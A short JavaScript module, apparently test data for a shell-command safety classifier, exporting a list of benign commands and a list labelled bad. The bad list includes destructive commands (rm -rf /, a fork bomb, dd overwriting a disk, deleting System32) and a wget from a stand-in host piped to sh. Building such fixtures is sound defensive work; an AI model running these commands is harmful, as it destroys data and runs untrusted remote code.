export const goodCmd = ["apt-get install sudo",
    "telnet platform.sh",
    "man bash",
    "find . -size +10M -type f -print0 | xargs -0 ls -Ssh | sort -z",
    "systemctl enable docker",
    "systemctl start docker",
    "sudo apt-get update && sudo apt-get upgrade",
    "curl platform.sh",
    "vim game.txt",
    "du -ah",
    "du -sh",
    "$(( ( RANDOM % 10 )  + 1 ))",
    "date",
    "curl database:27017",
    "cat test.json",
    "tail -n 100 /var/log/httpd/access_log"]


export const badCmd = ["rm -rf /",
    "rm -rf *",
    ":(){ :|: & };:",
    "dd if=/dev/random of=/dev/sda",
    "mv ~ /dev/null",
    "mv /home/user/* /dev/null",
    "wget http://badwebsite.com/hackyourcomputer -O – | sh",
    "sh runstackoverflowcode.sh",
    "del C:\Windows\System32"
];

export default [goodCmd, badCmd];